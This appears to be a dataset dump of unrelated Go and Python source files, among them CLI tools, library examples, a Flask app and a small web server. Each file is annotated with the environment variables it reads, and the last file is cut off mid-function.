if err := releaseProject(options); err != nil {
log.WithError(err).Errorf(color.New(color.Bold).Sprintf("release failed after %0.2fs", time.Since(start).Seconds()))
os.Exit(1)
return
}
log.Infof(color.New(color.Bold).Sprintf("release succeeded after %0.2fs", time.Since(start).Seconds()))
}
}
func checkConfig(filename string) error {
cfg, err := loadConfig(filename)
if err != nil {
return err
}
var ctx = context.New(cfg)
return ctrlc.Default.Run(ctx, func() error {
log.Info(color.New(color.Bold).Sprint("checking config:"))
return defaults.Pipe{}.Run(ctx)
})
}
func releaseProject(options releaseOptions) error {
cfg, err := loadConfig(options.Config)
if err != nil {
return err
}
ctx, cancel := context.NewWithTimeout(cfg, options.Timeout)
defer cancel()
ctx.Parallelism = options.Parallelism
log.Debugf("parallelism: %v", ctx.Parallelism)
ctx.ReleaseNotes = options.ReleaseNotes
ctx.ReleaseHeader = options.ReleaseHeader
ctx.ReleaseFooter = options.ReleaseFooter
ctx.Snapshot = options.Snapshot
ctx.SkipPublish = ctx.Snapshot || options.SkipPublish
ctx.SkipValidate = ctx.Snapshot || options.SkipValidate
ctx.SkipSign = options.SkipSign
ctx.RmDist = options.RmDist
return ctrlc.Default.Run(ctx, func() error {
for _, pipe := range pipeline.Pipeline {
if err := middleware.Logging(
pipe.String(),
middleware.ErrHandler(pipe.Run),
middleware.DefaultInitialPadding,
)(ctx); err != nil {
return err
}
}
return nil
})
}
// InitProject creates an example goreleaser.yml in the current directory
func initProject(filename string) error {
if _, err := os.Stat(filename); !os.IsNotExist(err) {
if err != nil {
return err
}
return fmt.Errorf("%s already exists", filename)
}
log.Infof(color.New(color.Bold).Sprintf("Generating %s file", filename))
return ioutil.WriteFile(filename, []byte(static.ExampleConfig), 0644)
}
func loadConfig(path string) (config.Project, error) {
if path != "" {
return config.Load(path)
}
for _, f := range [4]string{
".goreleaser.yml",
".goreleaser.yaml",
"goreleaser.yml",
"goreleaser.yaml",
} {
proj, err := config.Load(f)
if err != nil && os.IsNotExist(err) {
continue
}
return proj, err
}
// the user didn't specify a config file and the known possible file names
// don't exist, so, return an empty config and a nil err.
log.Warn("could not find a config file, using defaults...")
return config.Project{}, nil
}
func buildVersion(version, commit, date, builtBy string) string {
var result = fmt.Sprintf("version: %s", version)
if commit != "" {
result = fmt.Sprintf("%s\ncommit: %s", result, commit)
}
if date != "" {
result = fmt.Sprintf("%s\nbuilt at: %s", result, date)
}
if builtBy != "" {
result = fmt.Sprintf("%s\nbuilt by: %s", result, builtBy)
}
return result
}
| [
"\"CI\""
]
| []
| [
"CI"
]
| [] | ["CI"] | go | 1 | 0 | |
examples/statement/main.go | package main
import (
"context"
"database/sql"
"fmt"
"log"
"os"
_ "github.com/jackc/pgx/v4/stdlib"
"github.com/opendoor/pggen"
"github.com/opendoor/pggen/examples/statement/models"
)
func main() {
ctx := context.Background()
conn, err := sql.Open("pgx", os.Getenv("DB_URL"))
if err != nil {
log.Fatal(err)
}
pgClient := models.NewPGClient(conn)
id, err := pgClient.InsertUser(ctx, &models.User{
Email: "[email protected]",
Nickname: "Alph",
})
if err != nil {
log.Fatal(err)
}
_, err = pgClient.DeleteUsersByNickname(ctx, "Alph")
if err != nil {
log.Fatal(err)
}
_, err = pgClient.GetUser(ctx, id)
if err == nil {
log.Fatal("Alph is unexpectedly still in the db")
}
if pggen.IsNotFoundError(err) {
fmt.Printf("Alph not found\n")
}
}
| [
"\"DB_URL\""
]
| []
| [
"DB_URL"
]
| [] | ["DB_URL"] | go | 1 | 0 | |
xor-nn-eval.py | import os
import tensorflow as tf
import time
import csv
# Used to supress AVX warnings
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
NUM_EXAMPLES = 4 # Number of training or evaluation examples
NUM_FEATURES = 2 # Number of input features
NUM_LABELS = 1 # Number of output features or class labels
NUM_HIDDEN = 2 # Number of hidden/middle layer nodes
# Path to training or evaluation file - NEW DATA
INPUT_FILE = "data/xor-eval.csv"
# Path to the network model save file - TRAINED MODEL
MODEL_PATH = "data/xor-model.ckpt"
# Array for the input features
trainx = []
# Array for the output labels/features
trainy = []
# Load inputs and labels from disk
# NOTE: assumes 2 inputs followed by 1 label
# NOTE: files assumed to be located in a data directory
with open(INPUT_FILE, 'r') as csvfile:
input_data = csv.reader(csvfile, delimiter=',')
for row in input_data:
trainx.append([float(row[0]), float(row[1])])
trainy.append([float(row[2])])
# Define the input layer placeholders
x_ = tf.placeholder(tf.float32, shape=[NUM_EXAMPLES, NUM_FEATURES], name = 'inputs')
# Define the desired/target output placeholders
y_ = tf.placeholder(tf.float32, shape=[NUM_EXAMPLES, NUM_LABELS], name = 'labels')
# Define weights
Weights1 = tf.Variable(tf.random_uniform([NUM_FEATURES, NUM_HIDDEN], -1, 1), name = "Weights1")
Weights2 = tf.Variable(tf.random_uniform([NUM_HIDDEN, NUM_LABELS], -1, 1), name = "Weights2")
# Define the BIAS node
Bias1 = tf.Variable(tf.zeros([NUM_HIDDEN]), name = "Bias1")
Bias2 = tf.Variable(tf.zeros([NUM_LABELS]), name = "Bias2")
# Feed forward to the hidden layer
H1 = tf.sigmoid(tf.matmul(x_, Weights1) + Bias1)
# Feedforward to the output layer - Hypothesis is what the
# neural network thinks it should output for a
# given input.
Hypothesis = tf.sigmoid(tf.matmul(H1, Weights2) + Bias2)
# Setup the cost function and set the traning method
# We are using the squared error (ACTUAL - DESIRED)
cost = tf.reduce_sum(tf.square(Hypothesis - y_))
# Initialise the variables and create a session
init = tf.global_variables_initializer()
# 'Saver' op to save and restore all the variables
saver = tf.train.Saver()
sess = tf.Session()
# Initialise the session
sess.run(init)
# Restore model weights from previously saved model
saver.restore(sess, MODEL_PATH)
#print("Model restored from file: %s" % save_path)
print("Model restored from file")
# Run the network
t_start = time.clock()
# This will run the network and return the hypothesis results along with the cost/error
hp, ct = sess.run([Hypothesis,cost], feed_dict={x_: trainx, y_: trainy})
print("Hypothesis\tTarget\tError")
for i in range(len(hp)):
hyp_error = abs(hp[i] - trainy[i])
print(hp[i], '\t', trainy[i], '\t', hyp_error)
t_end = time.clock()
print('\n---------------RESULTS------------------------')
print('\nCost: ', ct)
print('Elapsed time: ', t_end - t_start)
print('\n----------------------------------------------')
| []
| []
| [
"TF_CPP_MIN_LOG_LEVEL"
]
| [] | ["TF_CPP_MIN_LOG_LEVEL"] | python | 1 | 0 | |
example/annict/main.go | package main
import (
"context"
"fmt"
"net/http"
"os"
"github.com/vanillaricewraps/gqlgenc/client"
"github.com/vanillaricewraps/gqlgenc/example/annict/gen"
)
func main() {
key := os.Getenv("ANNICT_KEY")
authHeader := func(req *http.Request) {
req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
}
annictClient := NewAnnictClient(client.NewClient(http.DefaultClient, "https://api.annict.com/graphql", authHeader))
ctx := context.Background()
getProfile, err := annictClient.GetProfile(ctx)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
fmt.Println(*getProfile.Viewer.AvatarURL, getProfile.Viewer.RecordsCount, getProfile.Viewer.WatchedCount)
list, err := annictClient.SearchWorks(ctx, []string{"2017-spring"})
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
for _, node := range list.SearchWorks.Nodes {
fmt.Println(node.ID, node.AnnictID, node.Title, *node.Work.Image.RecommendedImageURL)
}
getWork, err := annictClient.GetWork(ctx, []int64{list.SearchWorks.Nodes[0].AnnictID})
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
work := getWork.SearchWorks.Nodes[0]
_, err = annictClient.UpdateWorkStatus(ctx, work.ID)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
_, err = annictClient.CreateRecordMutation(ctx, work.Episodes.Nodes[0].ID)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
getProfile2, err := annictClient.GetProfile(ctx)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
fmt.Println(getProfile2.Viewer.RecordsCount, getProfile2.Viewer.WatchedCount)
res, err := annictClient.ListWorks(ctx, nil, nil, 5)
if err != nil {
fmt.Fprintf(os.Stderr, "error: %s", err.Error())
os.Exit(1)
}
fmt.Println(res.Viewer.Works.Edges[0].Node.Title, res.Viewer.Works.Edges[0].Cursor, len(res.Viewer.Works.Edges))
}
func NewAnnictClient(c *client.Client) *gen.Client {
return &gen.Client{Client: c}
}
| [
"\"ANNICT_KEY\""
]
| []
| [
"ANNICT_KEY"
]
| [] | ["ANNICT_KEY"] | go | 1 | 0 | |
frameworks/shared/callee.py | import logging
import os
import re
import signal
import sys
from .serialization import deserialize_data, serialize_data
from .utils import InterruptTimeout, Namespace as ns, json_dump, json_loads, kill_proc_tree, touch
class FrameworkError(Exception):
pass
def setup_logger():
console = logging.StreamHandler(sys.stdout)
console.setLevel(logging.INFO)
handlers = [console]
logging.basicConfig(handlers=handlers)
root = logging.getLogger()
root.setLevel(logging.INFO)
trace_level = os.environ.get('AMLB_LOG_TRACE')
if trace_level:
logging.TRACE = int(trace_level)
setup_logger()
log = logging.getLogger(__name__)
def result(output_file=None,
predictions=None, truth=None,
probabilities=None, probabilities_labels=None,
target_is_encoded=False,
error_message=None,
models_count=None,
training_duration=None,
predict_duration=None,
**others):
return locals()
def output_subdir(name, config):
subdir = os.path.join(config.output_dir, name, config.name, str(config.fold))
touch(subdir, as_dir=True)
return subdir
def save_metadata(config, **kwargs):
obj = dict(config.__dict__)
obj.update(kwargs)
json_dump(obj, config.output_metadata_file, style='pretty')
data_keys = re.compile("^(X|y|data)(_.+)?$")
def call_run(run_fn):
# log.info(os.environ)
params = ns.from_dict(json_loads(sys.stdin.read()))
def load_data(name, path, **_):
if isinstance(path, str) and data_keys.match(name):
return name, deserialize_data(path)
return name, path
log.debug("Params read from main process:\n%s", params)
ds = ns.walk(params.dataset, load_data)
config = params.config
config.framework_params = ns.dict(config.framework_params)
try:
with InterruptTimeout(config.job_timeout_seconds,
interruptions=[
dict(sig=TimeoutError),
dict(sig=signal.SIGTERM),
dict(sig=signal.SIGQUIT),
dict(sig=signal.SIGKILL),
dict(interrupt='process', sig=signal.SIGKILL)
],
wait_retry_secs=10):
result = run_fn(ds, config)
res = dict(result)
for name in ['predictions', 'truth', 'probabilities']:
arr = result[name]
if arr is not None:
path = os.path.join(config.result_dir, '.'.join([name, 'data']))
res[name] = serialize_data(arr, path)
except BaseException as e:
log.exception(e)
res = dict(
error_message=str(e),
models_count=0
)
finally:
# ensure there's no subprocess left
kill_proc_tree(include_parent=False, timeout=5)
json_dump(res, config.result_file, style='compact')
| []
| []
| [
"AMLB_LOG_TRACE"
]
| [] | ["AMLB_LOG_TRACE"] | python | 1 | 0 | |
tests/conftest.py | import os
from shutil import rmtree, copy
from tempfile import gettempdir
from pathlib import Path
import pytest
from pew._utils import invoke_pew as invoke
@pytest.yield_fixture(scope='session')
def workon_home():
tmpdir = os.environ.get('TMPDIR', gettempdir())
os.environ['WORKON_HOME'] = str(Path(tmpdir) / 'WORKON_HOME')
workon = Path(os.environ['WORKON_HOME'])
rmtree(str(workon), ignore_errors=True)
workon.mkdir(parents=True)
yield workon
rmtree(str(workon))
@pytest.yield_fixture()
def env1(workon_home):
invoke('new', 'env1', '-d')
yield
invoke('rm', 'env1')
@pytest.yield_fixture()
def env2(workon_home):
invoke('new', 'env2', '-d')
yield
invoke('rm', 'env2')
@pytest.yield_fixture()
def testpackageenv(workon_home):
testpackage = str(Path(__file__).parent / 'testpackage')
invoke('new', 'source', '-d')
invoke('in', 'source', 'python', 'setup.py', 'install', cwd=testpackage)
yield
invoke('rm', 'source')
@pytest.yield_fixture()
def testtemplate(workon_home):
sourcetemplate = Path(__file__).parent / 'template_test'
testtemplatefile = workon_home / 'template_test'
copy(str(sourcetemplate), str(testtemplatefile))
testtemplatefile.chmod(0o700)
yield testtemplatefile
testtemplatefile.unlink()
| []
| []
| [
"WORKON_HOME",
"TMPDIR"
]
| [] | ["WORKON_HOME", "TMPDIR"] | python | 2 | 0 | |
go/cmd/unissh-list-machines/main.go | package main
import (
"crypto/tls"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"os"
"sort"
"text/tabwriter"
"github.com/spf13/pflag"
"golang.org/x/xerrors"
"software.sslmate.com/src/go-pkcs12"
)
const (
apiClientUserAgent = "unissh/0.1"
RCOk = "ok"
RCError = "error"
)
type Meta struct {
RC string `json:"rc"`
Message string `json:"msg"`
}
type ListClientResponse struct {
Meta Meta `json:"meta"`
Data []*SiteClient `json:"data"`
}
type ListDeviceResponse struct {
Meta Meta `json:"meta"`
Data []*SiteDevice `json:"data"`
}
type SiteClient struct {
Name string `json:"name"` // The name of client
Hostname string `json:"hostname"` // (Optional) Hostname of client
IP string `json:"ip"` // IP Address
MAC string `json:"mac"` // MAC Address
Network string `json:"network"` // The name of network which is the client connected
NetworkId string `json:"network_id"` // The id of network which is the client connected
SiteId string `json:"site_id"`
AssociationTime int `json:"assoc_time"`
LatestAssociationTime int `json:"latest_assoc_time"`
OUI string `json:"oui"`
UserId string `json:"user_id"`
IsGuest bool `json:"is_guest"`
FirstSeen int `json:"first_seen"`
LastSeen int `json:"last_seen"`
IsWired bool `json:"is_wired"`
Noted bool `json:"noted"`
APMAC string `json:"ap_mac"`
Channel int `json:"channel"`
Radio string `json:"radio"`
RadioName string `json:"radio_name"`
ESSID string `json:"essid"`
BSSID string `json:"bssid"`
PowersaveEnabled bool `json:"powersave_enabled"`
Is11r bool `json:"is_11r"`
CCQ int `json:"ccq"`
RSSI int `json:"rssi"`
Noise int `json:"noise"`
Signal int `json:"signal"`
TXRate int `json:"tx_rate"`
RXRate int `json:"rx_rate"`
TXPower int `json:"tx_power"`
IdleTime int `json:"idletime"`
DHCPEndTime int `json:"dhcpend_time"`
Satisfaction int `json:"satisfaction"`
VLAN int `json:"vlan"`
Uptime int `json:"uptime"`
RadioProto string `json:"radio_proto"`
TXBytes int64 `json:"tx_bytes"`
TXPackets int64 `json:"tx_packets"`
TXRetries int64 `json:"tx_retries"`
RXBytes int64 `json:"rx_bytes"`
RXPackets int64 `json:"rx_packets"`
WiFiTXAttempts int `json:"wifi_tx_attempts"`
Authorized bool `json:"authorized"`
}
type SiteDeviceType string
const (
SiteDeviceTypeUSG SiteDeviceType = "usg"
SiteDeviceTypeUSW SiteDeviceType = "usw"
SiteDeviceTypeUAP SiteDeviceType = "uap"
)
type Radio struct {
Name string `json:"name"`
Radio string `json:"radio"`
HT string `json:"ht"`
Channel interface{} `json:"channel"`
TXPowerMode string `json:"tx_power_mode"`
AntennaGain int `json:"antenna_gain"`
MinRSSIEnabled bool `json:"min_rssi_enabled"`
HardNoiseFloorEnabled bool `json:"hard_noise_floor_enabled"`
SensLevelEnabled bool `json:"sens_level_enabled"`
VWireEnabled bool `json:"vwire_enabled"`
MaxTXPower int `json:"max_tx_power"`
MinTXPower int `json:"min_tx_power"`
NSS int `json:"nss"`
RadioCaps int `json:"radio_caps"`
BuiltinAntenna bool `json:"builtin_antenna"`
BuiltinAntennaGain int `json:"builtin_ant_gain"`
CurrentAntennaGain int `json:"current_antenna_gain"`
}
type Ethernet struct {
Name string `json:"name"`
MAC string `json:"mac"`
NumberOfPort int `json:"num_port"`
}
type Port struct {
Name string `json:"name"`
Enable bool `json:"enable"`
Index int `json:"port_idx"`
Media string `json:"media"`
PoE bool `json:"port_poe"`
PoECaps int `json:"poe_caps"`
SpeedCaps int `json:"speed_caps"`
OpMode string `json:"op_mode"`
AutoNeg bool `json:"auto_neg"`
FlowControlRX bool `json:"flowctrl_rx"`
FlowControlTX bool `json:"flowctrl_tx"`
FullDuplex bool `json:"full_duplex"`
IsUplink bool `json:"is_uplink"`
Jumbo bool `json:"jumbo"`
RXBroadcast int64 `json:"rx_broadcast"`
RXBytes int64 `json:"rx_bytes"`
RXDrops int64 `json:"rx_drops"`
RXErrors int64 `json:"rx_errors"`
RXMulticast int64 `json:"rx_multicast"`
RXPackets int64 `json:"rx_packets"`
Satisfaction int `json:"satisfaction"`
STPPathCost int `json:"stp_pathcost"`
STPState string `json:"stp_state"`
TXBroadcast int64 `json:"tx_broadcast"`
TXBytes int64 `json:"tx_bytes"`
TXDrops int64 `json:"tx_drops"`
TXErrors int64 `json:"tx_errors"`
TXMulticast int64 `json:"tx_multicast"`
TXPackets int64 `json:"tx_packets"`
Up bool `json:"up"`
RXByteR int `json:"rx_byte-r"`
TXByteR int `json:"tx_byte-r"`
Masked bool `json:"masked"`
AggregatedBy bool `json:"aggregated_by"`
}
type SiteDevice struct {
Type SiteDeviceType `json:"type"`
Name string `json:"name"` // The name of device
IP string `json:"ip"` // IP Address
MAC string `json:"mac"` // MAC address
Model string `json:"model"`
Serial string `json:"serial"` // Serial code of device
Version string `json:"version"` // Firmware version
InformUrl string `json:"inform_url"`
InformIP string `json:"inform_ip"`
Adopted bool `json:"adopted"`
SiteID string `json:"site_id"`
SSHHostKeyFingerprint string `json:"x_ssh_hostkey_fingerprint"`
Fingerprint string `json:"x_fingerprint"`
Radio []*Radio `json:"radio_table"`
KernelVersion string `json:"kernel_version"`
Architecture string `json:"architecture"`
GatewayMAC string `json:"gateway_mac"`
Uptime int `json:"uptime"`
Ethernet []*Ethernet `json:"ethernet"`
Port []*Port `json:"port_table"`
HasFan bool `json:"has_fan"`
HasTemperature bool `json:"has_temperature"`
LEDOverride string `json:"led_override"`
LEDOverrideColor string `json:"led_override_color"`
LEDOverrideColorBrightness int `json:"led_override_color_brightness"`
OutdoorModeOverride string `json:"outdoor_mode_override"`
LastSeen int `json:"last_seen"`
Upgradable bool `json:"upgradable"`
Uplink *Port `json:"uplink"`
}
type client struct {
Name string
IP string
}
func getClient(client *http.Client, host, site string) ([]*SiteClient, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("https://%s/api/s/%s/stat/sta", host, site), nil)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
req.Header.Add("User-Agent", apiClientUserAgent)
res, err := client.Do(req)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
defer res.Body.Close()
if res.StatusCode != http.StatusOK {
return nil, xerrors.Errorf("returns status not ok: %s", res.Status)
}
resBody := &ListClientResponse{}
if err := json.NewDecoder(res.Body).Decode(resBody); err != nil {
return nil, xerrors.Errorf(": %w", err)
}
if resBody.Meta.RC != RCOk {
return nil, xerrors.New(resBody.Meta.Message)
}
return resBody.Data, nil
}
func getDevice(client *http.Client, host, site string) ([]*SiteDevice, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("https://%s/api/s/%s/stat/device", host, site), nil)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
req.Header.Add("User-Agent", apiClientUserAgent)
res, err := client.Do(req)
if err != nil {
return nil, xerrors.Errorf(": %w", err)
}
resBody := &ListDeviceResponse{}
if err := json.NewDecoder(res.Body).Decode(resBody); err != nil {
return nil, xerrors.Errorf(": %w", err)
}
if err := res.Body.Close(); err != nil {
return nil, xerrors.Errorf(": %w", err)
}
if resBody.Meta.RC != RCOk {
return nil, xerrors.New(resBody.Meta.Message)
}
return resBody.Data, nil
}
func unissh(host, credentialFile, password, site string) error {
b, err := ioutil.ReadFile(credentialFile)
if err != nil {
return xerrors.Errorf(": %w", err)
}
privateKey, certificate, _, err := pkcs12.DecodeChain(b, password)
if err != nil {
return xerrors.Errorf(": %w", err)
}
tlsCert := tls.Certificate{PrivateKey: privateKey, Certificate: [][]byte{certificate.Raw}}
httpClient := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{
Certificates: []tls.Certificate{tlsCert},
},
},
}
clients, err := getClient(httpClient, host, site)
if err != nil {
return xerrors.Errorf(": %w", err)
}
devices, err := getDevice(httpClient, host, site)
if err != nil {
return xerrors.Errorf(": %w", err)
}
siteClients := make([]*client, 0)
for _, v := range clients {
name := v.Name
if name == "" {
name = v.Hostname
}
siteClients = append(siteClients, &client{Name: name, IP: v.IP})
}
for _, v := range devices {
siteClients = append(siteClients, &client{Name: v.Name, IP: v.IP})
}
sort.Slice(siteClients, func(i, j int) bool {
return siteClients[i].Name < siteClients[j].Name
})
w := new(tabwriter.Writer)
w.Init(os.Stdout, 0, 8, 1, '\t', 0)
fmt.Fprintln(w, "Name\tIP\t")
for _, v := range siteClients {
fmt.Fprintf(w, "%s\t%s\n", v.Name, v.IP)
}
w.Flush()
return nil
}
func main() {
host := ""
credentialFile := ""
password := ""
site := "default"
fs := pflag.NewFlagSet("unissh-list-machines", pflag.ContinueOnError)
fs.StringVar(&host, "host", "127.0.0.1:8443", "Unifi Controller URL")
fs.StringVar(&credentialFile, "credential", "", "Credential file (p12)")
fs.StringVar(&password, "password", "", "Password of p12")
fs.StringVar(&site, "site", site, "Site name")
if err := fs.Parse(os.Args[1:]); err != nil {
fs.PrintDefaults()
os.Exit(1)
}
if credentialFile == "" {
credentialFile = os.Getenv("UNISSH_CREDENTIAL_FILE")
}
if password == "" {
password = os.Getenv("UNISSH_PASSWORD")
}
if err := unissh(host, credentialFile, password, site); err != nil {
fmt.Fprintf(os.Stderr, "%+v\n", err)
os.Exit(1)
}
}
| [
"\"UNISSH_CREDENTIAL_FILE\"",
"\"UNISSH_PASSWORD\""
]
| []
| [
"UNISSH_CREDENTIAL_FILE",
"UNISSH_PASSWORD"
]
| [] | ["UNISSH_CREDENTIAL_FILE", "UNISSH_PASSWORD"] | go | 2 | 0 | |
algorithms/Python/strings/sherlock and the valid string.py | #!/bin/python3
import math
import os
import random
import re
import sys
# Complete the isValid function below.
def isValid(s):
ss = list(set(s))
fs = []
for c in ss:
fs.append(s.count(c))
if (len(list(set(fs))))==1:
return 'YES'
elif len(list(set(fs)))==2:
mx= max(fs)
mi= min(fs)
if (fs.count(mx) ==1 or fs.count(mi)==1) and (mx-mi == 1):
return 'YES'
elif fs.count(mi)==1 and mi==1:
return 'YES'
return 'NO'
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
result = isValid(s)
fptr.write(result + '\n')
fptr.close()
| []
| []
| [
"OUTPUT_PATH"
]
| [] | ["OUTPUT_PATH"] | python | 1 | 0 | |
app/routes.py | import os
from flask import Flask, render_template, request, session, g, redirect
from magicsquare import app
import sqlite3
from contextlib import ExitStack
from pathlib import Path
from cqc.pythonLib import CQCConnection, qubit
from libmagicsquare import MagicSquare
import sqlite3
DB_FILE=os.environ.get("MAGICSQUARE_DB_FILE") or "sessions.db"
# Create DB_FILE if needed:
print("Database file: {}".format(DB_FILE))
folder=os.path.dirname(DB_FILE)
if folder:
os.makedirs(folder, exist_ok=True)
conn = sqlite3.connect(DB_FILE)
conn.execute('CREATE TABLE IF NOT EXISTS session (id VARCHAR(256), p1line VARCHAR(256), p1val VARCHAR(256), p2col VARCHAR(256), p2val VARCHAR(256), qres1 VARCHAR(256), qres2 VARCHAR(256))')
conn.commit()
conn.close()
@app.route('/')
@app.route('/index')
def index():
return render_template('accueil.html', titre='Accueil')
def waiting(idsess):
conn = sqlite3.connect(DB_FILE)
curr=conn.cursor()
items=curr.execute("SELECT * FROM session WHERE id=? ", (idsess,))
return render_template('waiting.html', items=items.fetchall() )
@app.route('/player1')
def p1():
return render_template('p1.html', titre='player 1')
@app.route('/waiting1',methods = ["POST"])
def waiting1():
conn = sqlite3.connect(DB_FILE)
ids = request.form["numsess"]
numline = request.form["numline"]
x1 = request.form["select1"]
x2 = request.form["select2"]
x3 = request.form["select3"]
x=x1+x2+x3
p2c= 0
p2x= 0
curr=conn.cursor()
curr.execute("INSERT INTO session (id,p1line,p1val,p2col,p2val,qres1,qres2) VALUES (?,?,?,?,?,?,?)",[ids,numline,x,p2c,p2x,"",""] )
conn.commit()
return waiting(ids)
@app.route('/player2')
def p2():
return render_template('p2.html', titre='Player 2')
@app.route('/waiting2',methods = ["POST"])
def waiting2():
conn = sqlite3.connect(DB_FILE)
ids = request.form["numsess"]
numcol = request.form["numline"]
x1 = request.form["select1"]
x2 = request.form["select2"]
x3 = request.form["select3"]
# Classical
x=x1+x2+x3
curr=conn.cursor()
curr.execute("UPDATE session SET p2col=?, p2val=? WHERE id=? ", (numcol, x, ids))
conn.commit()
return waiting(ids)
@app.route('/results/<ids>/',methods = ["GET"])
def results(ids):
conn = sqlite3.connect(DB_FILE)
curr=conn.cursor()
items=curr.execute("SELECT * FROM session WHERE id=? ", (ids,))
items1=items.fetchone()
numline=int(items1[1])-1
numcol=int(items1[3])-1
qres1=items1[5]
qres2=items1[6]
if qres1 == "" or qres2 == "":
# Quantum
with ExitStack() as global_stack:
magic_square = MagicSquare(global_stack, debug=True)
ma = magic_square.alice_measurement(numline)
mb = magic_square.bob_measurement(numcol)
conn = sqlite3.connect(DB_FILE)
curr=conn.cursor()
curr.execute("UPDATE session SET qres1=?, qres2=? WHERE id=? ", (qres1, qres2, ids))
conn.commit()
return render_template('resultats.html', items1=items1, ma=ma, mb=mb, titre="Résultats")
| []
| []
| [
"MAGICSQUARE_DB_FILE"
]
| [] | ["MAGICSQUARE_DB_FILE"] | python | 1 | 0 | |
wandb/sdk/service/service.py | """grpc service.
Reliably launch and connect to grpc process.
"""
import datetime
import enum
import logging
import os
import subprocess
import sys
import tempfile
import time
from typing import Any, Dict, Optional
from typing import TYPE_CHECKING
import grpc
from wandb.proto import wandb_server_pb2 as spb
from wandb.proto import wandb_server_pb2_grpc as pbgrpc
from wandb.sdk.wandb_settings import Settings
if TYPE_CHECKING:
from google.protobuf.internal.containers import MessageMap
def _pbmap_apply_dict(
m: "MessageMap[str, spb.SettingsValue]", d: Dict[str, Any]
) -> None:
for k, v in d.items():
if isinstance(v, datetime.datetime):
continue
if isinstance(v, enum.Enum):
continue
sv = spb.SettingsValue()
if v is None:
sv.null_value = True
elif isinstance(v, int):
sv.int_value = v
elif isinstance(v, float):
sv.float_value = v
elif isinstance(v, str):
sv.string_value = v
elif isinstance(v, bool):
sv.bool_value = v
elif isinstance(v, tuple):
sv.tuple_value.string_values.extend(v)
m[k].CopyFrom(sv)
class _Service:
_stub: Optional[pbgrpc.InternalServiceStub]
def __init__(self) -> None:
self._stub = None
def _grpc_wait_for_port(
self, fname: str, proc: subprocess.Popen = None
) -> Optional[int]:
time_max = time.time() + 30
port = None
while time.time() < time_max:
if proc and proc.poll():
# process finished
print("proc exited with", proc.returncode)
return None
if not os.path.isfile(fname):
time.sleep(0.2)
continue
try:
f = open(fname)
port = int(f.read())
except Exception as e:
print("Error:", e)
return port
return None
def _grpc_launch_server(self) -> Optional[int]:
"""Launch grpc server and return port."""
# References for starting processes
# - https://github.com/wandb/client/blob/archive/old-cli/wandb/__init__.py
# - https://stackoverflow.com/questions/1196074/how-to-start-a-background-process-in-python
kwargs: Dict[str, Any] = dict(close_fds=True)
pid = os.getpid()
with tempfile.TemporaryDirectory() as tmpdir:
fname = os.path.join(tmpdir, f"port-{pid}.txt")
pid_str = str(os.getpid())
exec_cmd_list = [sys.executable, "-m"]
# Add coverage collection if needed
if os.environ.get("COVERAGE_RCFILE"):
exec_cmd_list += ["coverage", "run", "-m"]
internal_proc = subprocess.Popen(
exec_cmd_list
+ [
"wandb",
"service",
"--port-filename",
fname,
"--pid",
pid_str,
"--debug",
"true",
],
env=os.environ,
**kwargs,
)
port = self._grpc_wait_for_port(fname, proc=internal_proc)
return port
def start(self) -> Optional[int]:
port = self._grpc_launch_server()
return port
def connect(self, port: int) -> None:
channel = grpc.insecure_channel("localhost:{}".format(port))
stub = pbgrpc.InternalServiceStub(channel)
self._stub = stub
# TODO: make sure service is up
def _get_stub(self) -> Optional[pbgrpc.InternalServiceStub]:
return self._stub
def _svc_inform_init(self, settings: Settings, run_id: str) -> None:
assert self._stub
inform_init = spb.ServerInformInitRequest()
settings_dict = dict(settings)
settings_dict["_log_level"] = logging.DEBUG
_pbmap_apply_dict(inform_init._settings_map, settings_dict)
inform_init._info.stream_id = run_id
_ = self._stub.ServerInformInit(inform_init)
def _svc_inform_finish(self, run_id: str = None) -> None:
assert self._stub
assert run_id
inform_fin = spb.ServerInformFinishRequest()
inform_fin._info.stream_id = run_id
_ = self._stub.ServerInformFinish(inform_fin)
def _svc_inform_attach(self, attach_id: str) -> None:
assert self._stub
inform_attach = spb.ServerInformAttachRequest()
inform_attach._info.stream_id = attach_id
_ = self._stub.ServerInformAttach(inform_attach)
def _svc_inform_teardown(self, exit_code: int) -> None:
assert self._stub
inform_fin = spb.ServerInformTeardownRequest(exit_code=exit_code)
_ = self._stub.ServerInformTeardown(inform_fin)
| []
| []
| [
"COVERAGE_RCFILE"
]
| [] | ["COVERAGE_RCFILE"] | python | 1 | 0 | |
hello-app/main.go | /**
* Copyright 2017 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// [START container_hello_app]
package main
import (
"fmt"
"log"
"net/http"
"os"
)
func main() {
// register hello function to handle all requests
mux := http.NewServeMux()
mux.HandleFunc("/", hello)
// use PORT environment variable, or default to 8080
port := os.Getenv("PORT")
if port == "" {
port = "8080"
}
// start the web server on port and accept requests
log.Printf("Server listening on port %s", port)
log.Fatal(http.ListenAndServe(":"+port, mux))
}
// hello responds to the request with a plain-text "Hello, world" message.
func hello(w http.ResponseWriter, r *http.Request) {
log.Printf("Serving request: %s", r.URL.Path)
host, _ := os.Hostname()
fmt.Fprintf(w, "Hello, world!\n")
